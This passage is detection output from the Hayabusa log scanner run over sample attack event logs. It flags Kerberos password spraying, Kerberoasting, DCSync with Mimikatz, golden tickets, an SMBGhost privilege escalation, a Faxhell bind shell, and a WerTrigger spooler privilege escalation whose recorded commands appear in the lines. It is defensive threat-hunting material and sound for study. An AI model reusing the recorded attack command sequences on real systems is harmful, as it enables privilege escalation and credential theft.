Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 
+09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD 
User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 
62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 
0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket 
issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : 